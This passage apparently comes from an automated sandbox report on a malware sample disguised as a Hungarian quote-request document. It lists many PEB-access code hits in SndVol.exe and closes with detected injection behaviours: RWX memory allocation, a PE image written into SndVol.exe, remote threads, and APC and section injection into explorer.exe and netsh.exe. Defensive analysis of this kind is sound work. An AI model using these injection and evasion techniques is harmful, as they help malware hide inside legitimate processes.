          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365992C5 mov eax, dword ptr fs:[00000030h]5_2_365992C5
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365992C5 mov eax, dword ptr fs:[00000030h]5_2_365992C5
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664F2F8 mov eax, dword ptr fs:[00000030h]5_2_3664F2F8
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365892FF mov eax, dword ptr fs:[00000030h]5_2_365892FF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366272A0 mov eax, dword ptr fs:[00000030h]5_2_366272A0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366272A0 mov eax, dword ptr fs:[00000030h]5_2_366272A0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C329E mov eax, dword ptr fs:[00000030h]5_2_365C329E
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C329E mov eax, dword ptr fs:[00000030h]5_2_365C329E
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366592A6 mov eax, dword ptr fs:[00000030h]5_2_366592A6
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366592A6 mov eax, dword ptr fs:[00000030h]5_2_366592A6
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366592A6 mov eax, dword ptr fs:[00000030h]5_2_366592A6
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366592A6 mov eax, dword ptr fs:[00000030h]5_2_366592A6
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366192BC mov eax, dword ptr fs:[00000030h]5_2_366192BC
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366192BC mov eax, dword ptr fs:[00000030h]5_2_366192BC
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366192BC mov ecx, dword ptr fs:[00000030h]5_2_366192BC
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366192BC mov ecx, dword ptr fs:[00000030h]5_2_366192BC
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36665283 mov eax, dword ptr fs:[00000030h]5_2_36665283
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A52A0 mov eax, dword ptr fs:[00000030h]5_2_365A52A0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A52A0 mov eax, dword ptr fs:[00000030h]5_2_365A52A0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A52A0 mov eax, dword ptr fs:[00000030h]5_2_365A52A0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A52A0 mov eax, dword ptr fs:[00000030h]5_2_365A52A0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664F367 mov eax, dword ptr fs:[00000030h]5_2_3664F367
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36589353 mov eax, dword ptr fs:[00000030h]5_2_36589353
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36589353 mov eax, dword ptr fs:[00000030h]5_2_36589353
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36633370 mov eax, dword ptr fs:[00000030h]5_2_36633370
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658D34C mov eax, dword ptr fs:[00000030h]5_2_3658D34C
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658D34C mov eax, dword ptr fs:[00000030h]5_2_3658D34C
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36665341 mov eax, dword ptr fs:[00000030h]5_2_36665341
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36597370 mov eax, dword ptr fs:[00000030h]5_2_36597370
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36597370 mov eax, dword ptr fs:[00000030h]5_2_36597370
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36597370 mov eax, dword ptr fs:[00000030h]5_2_36597370
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665132D mov eax, dword ptr fs:[00000030h]5_2_3665132D
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665132D mov eax, dword ptr fs:[00000030h]5_2_3665132D
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36587330 mov eax, dword ptr fs:[00000030h]5_2_36587330
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661930B mov eax, dword ptr fs:[00000030h]5_2_3661930B
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661930B mov eax, dword ptr fs:[00000030h]5_2_3661930B
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661930B mov eax, dword ptr fs:[00000030h]5_2_3661930B
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF32A mov eax, dword ptr fs:[00000030h]5_2_365BF32A
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664F3E6 mov eax, dword ptr fs:[00000030h]5_2_3664F3E6
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366653FC mov eax, dword ptr fs:[00000030h]5_2_366653FC
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664B3D0 mov ecx, dword ptr fs:[00000030h]5_2_3664B3D0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365E739A mov eax, dword ptr fs:[00000030h]5_2_365E739A
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365E739A mov eax, dword ptr fs:[00000030h]5_2_365E739A
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366313B9 mov eax, dword ptr fs:[00000030h]5_2_366313B9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366313B9 mov eax, dword ptr fs:[00000030h]5_2_366313B9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366313B9 mov eax, dword ptr fs:[00000030h]5_2_366313B9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3666539D mov eax, dword ptr fs:[00000030h]5_2_3666539D
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C33A0 mov eax, dword ptr fs:[00000030h]5_2_365C33A0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C33A0 mov eax, dword ptr fs:[00000030h]5_2_365C33A0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B33A5 mov eax, dword ptr fs:[00000030h]5_2_365B33A5
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36665060 mov eax, dword ptr fs:[00000030h]5_2_36665060
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BB052 mov eax, dword ptr fs:[00000030h]5_2_365BB052
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661106E mov eax, dword ptr fs:[00000030h]5_2_3661106E
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3660D070 mov ecx, dword ptr fs:[00000030h]5_2_3660D070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov ecx, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663705E mov ebx, dword ptr fs:[00000030h]5_2_3663705E
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663705E mov eax, dword ptr fs:[00000030h]5_2_3663705E
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665903E mov eax, dword ptr fs:[00000030h]5_2_3665903E
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665903E mov eax, dword ptr fs:[00000030h]5_2_3665903E
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665903E mov eax, dword ptr fs:[00000030h]5_2_3665903E
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665903E mov eax, dword ptr fs:[00000030h]5_2_3665903E
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B90DB mov eax, dword ptr fs:[00000030h]5_2_365B90DB
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov ecx, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov ecx, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov ecx, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov ecx, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3660D0C0 mov eax, dword ptr fs:[00000030h]5_2_3660D0C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3660D0C0 mov eax, dword ptr fs:[00000030h]5_2_3660D0C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B50E4 mov eax, dword ptr fs:[00000030h]5_2_365B50E4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B50E4 mov ecx, dword ptr fs:[00000030h]5_2_365B50E4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366650D9 mov eax, dword ptr fs:[00000030h]5_2_366650D9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C909C mov eax, dword ptr fs:[00000030h]5_2_365C909C
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BD090 mov eax, dword ptr fs:[00000030h]5_2_365BD090
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BD090 mov eax, dword ptr fs:[00000030h]5_2_365BD090
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36595096 mov eax, dword ptr fs:[00000030h]5_2_36595096
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658D08D mov eax, dword ptr fs:[00000030h]5_2_3658D08D
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661D080 mov eax, dword ptr fs:[00000030h]5_2_3661D080
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661D080 mov eax, dword ptr fs:[00000030h]5_2_3661D080
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36597152 mov eax, dword ptr fs:[00000030h]5_2_36597152
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36589148 mov eax, dword ptr fs:[00000030h]5_2_36589148
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36589148 mov eax, dword ptr fs:[00000030h]5_2_36589148
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36589148 mov eax, dword ptr fs:[00000030h]5_2_36589148
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36589148 mov eax, dword ptr fs:[00000030h]5_2_36589148
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36629179 mov eax, dword ptr fs:[00000030h]5_2_36629179
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36623140 mov eax, dword ptr fs:[00000030h]5_2_36623140
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36623140 mov eax, dword ptr fs:[00000030h]5_2_36623140
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36623140 mov eax, dword ptr fs:[00000030h]5_2_36623140
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36665152 mov eax, dword ptr fs:[00000030h]5_2_36665152
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36667120 mov eax, dword ptr fs:[00000030h]5_2_36667120
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36591131 mov eax, dword ptr fs:[00000030h]5_2_36591131
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36591131 mov eax, dword ptr fs:[00000030h]5_2_36591131
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3658B136 mov eax, dword ptr fs:[00000030h] | 5_2_3658B136
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_366631E1 mov eax, dword ptr fs:[00000030h] | 5_2_366631E1
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365CD1D0 mov eax, dword ptr fs:[00000030h] | 5_2_365CD1D0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365CD1D0 mov ecx, dword ptr fs:[00000030h] | 5_2_365CD1D0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_366371F9 mov esi, dword ptr fs:[00000030h] | 5_2_366371F9
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_366651CB mov eax, dword ptr fs:[00000030h] | 5_2_366651CB
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365B51EF mov eax, dword ptr fs:[00000030h] | 5_2_365B51EF
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365951ED mov eax, dword ptr fs:[00000030h] | 5_2_365951ED
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_366411A4 mov eax, dword ptr fs:[00000030h] | 5_2_366411A4
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365E7190 mov eax, dword ptr fs:[00000030h] | 5_2_365E7190
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_36645180 mov eax, dword ptr fs:[00000030h] | 5_2_36645180
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365AB1B0 mov eax, dword ptr fs:[00000030h] | 5_2_365AB1B0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365CBE51 mov eax, dword ptr fs:[00000030h] | 5_2_365CBE51
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365A5E40 mov eax, dword ptr fs:[00000030h] | 5_2_365A5E40
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3658BE78 mov ecx, dword ptr fs:[00000030h] | 5_2_3658BE78
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3664DE46 mov eax, dword ptr fs:[00000030h] | 5_2_3664DE46
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_36639E56 mov ecx, dword ptr fs:[00000030h] | 5_2_36639E56
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3658DE10 mov eax, dword ptr fs:[00000030h] | 5_2_3658DE10
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365CBE17 mov eax, dword ptr fs:[00000030h] | 5_2_365CBE17
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_36665E37 mov eax, dword ptr fs:[00000030h] | 5_2_36665E37
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_36591E30 mov eax, dword ptr fs:[00000030h] | 5_2_36591E30
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_36663E10 mov eax, dword ptr fs:[00000030h] | 5_2_36663E10
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365ADE2D mov eax, dword ptr fs:[00000030h] | 5_2_365ADE2D
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3665BEE6 mov eax, dword ptr fs:[00000030h] | 5_2_3665BEE6
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3658BEC0 mov eax, dword ptr fs:[00000030h] | 5_2_3658BEC0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3659BEC0 mov eax, dword ptr fs:[00000030h] | 5_2_3659BEC0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365BFEC0 mov eax, dword ptr fs:[00000030h] | 5_2_365BFEC0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3661FEC5 mov eax, dword ptr fs:[00000030h] | 5_2_3661FEC5
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_36593EF4 mov eax, dword ptr fs:[00000030h] | 5_2_36593EF4
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365C3EEB mov ecx, dword ptr fs:[00000030h] | 5_2_365C3EEB
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365C3EEB mov eax, dword ptr fs:[00000030h] | 5_2_365C3EEB
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_36593EE1 mov eax, dword ptr fs:[00000030h] | 5_2_36593EE1
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_36649EDF mov eax, dword ptr fs:[00000030h] | 5_2_36649EDF
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3661DEAA mov eax, dword ptr fs:[00000030h] | 5_2_3661DEAA
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_36597E96 mov eax, dword ptr fs:[00000030h] | 5_2_36597E96
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365C3E8F mov eax, dword ptr fs:[00000030h] | 5_2_365C3E8F
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3663DEB0 mov eax, dword ptr fs:[00000030h] | 5_2_3663DEB0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3663DEB0 mov ecx, dword ptr fs:[00000030h] | 5_2_3663DEB0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3664DEB0 mov eax, dword ptr fs:[00000030h] | 5_2_3664DEB0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3658FEA0 mov eax, dword ptr fs:[00000030h] | 5_2_3658FEA0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3661DE9B mov eax, dword ptr fs:[00000030h] | 5_2_3661DE9B
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3658DEA5 mov eax, dword ptr fs:[00000030h] | 5_2_3658DEA5
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3658DEA5 mov ecx, dword ptr fs:[00000030h] | 5_2_3658DEA5
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_36591F50 mov eax, dword ptr fs:[00000030h] | 5_2_36591F50
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365C7F51 mov eax, dword ptr fs:[00000030h] | 5_2_365C7F51
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3660FF42 mov eax, dword ptr fs:[00000030h] | 5_2_3660FF42
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365BBF60 mov eax, dword ptr fs:[00000030h] | 5_2_365BBF60
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3664DF2F mov eax, dword ptr fs:[00000030h] | 5_2_3664DF2F
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_36637F3E mov eax, dword ptr fs:[00000030h] | 5_2_36637F3E
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3661DF10 mov eax, dword ptr fs:[00000030h] | 5_2_3661DF10
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_36611F13 mov eax, dword ptr fs:[00000030h] | 5_2_36611F13
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3658BFD0 mov eax, dword ptr fs:[00000030h] | 5_2_3658BFD0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365C1FCD mov eax, dword ptr fs:[00000030h] | 5_2_365C1FCD
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_36593FC2 mov eax, dword ptr fs:[00000030h] | 5_2_36593FC2
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3664BFC0 mov ecx, dword ptr fs:[00000030h] | 5_2_3664BFC0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3664BFC0 mov eax, dword ptr fs:[00000030h] | 5_2_3664BFC0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_36663FC0 mov eax, dword ptr fs:[00000030h] | 5_2_36663FC0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365CBFEC mov eax, dword ptr fs:[00000030h] | 5_2_365CBFEC
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_36613FD7 mov eax, dword ptr fs:[00000030h] | 5_2_36613FD7
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365A1F92 mov ecx, dword ptr fs:[00000030h] | 5_2_365A1F92
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365A1F92 mov eax, dword ptr fs:[00000030h] | 5_2_365A1F92
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_01567450 MatchTagsInCmdLine,wcspbrk,GetProcessHeap,HeapAlloc,wcscpy_s,wcstok,MatchToken,PrintMessageFromModule,GetProcessHeap,HeapFree,wcscpy_s,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PrintMessageFromModule,PrintMessageFromModule, | 7_2_01567450
          Source: C:\Windows\SysWOW64\SndVol.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_01569930 SetUnhandledExceptionFilter, | 7_2_01569930
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_015696E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 7_2_015696E0

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 47C0000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Thread created: C:\Windows\SysWOW64\SndVol.exe EIP: 47DF110
          Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Memory written: C:\Windows\SysWOW64\SndVol.exe base: 47C0000 value starts with: 4D5A
          Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\SndVol.exe | Thread register set: target process: 2580
          Source: C:\Windows\SysWOW64\netsh.exe | Thread register set: target process: 2580
          Source: C:\Windows\SysWOW64\SndVol.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\SysWOW64\SndVol.exe | Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1560000
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Memory written: C:\Windows\SysWOW64\SndVol.exe base: 47C0000
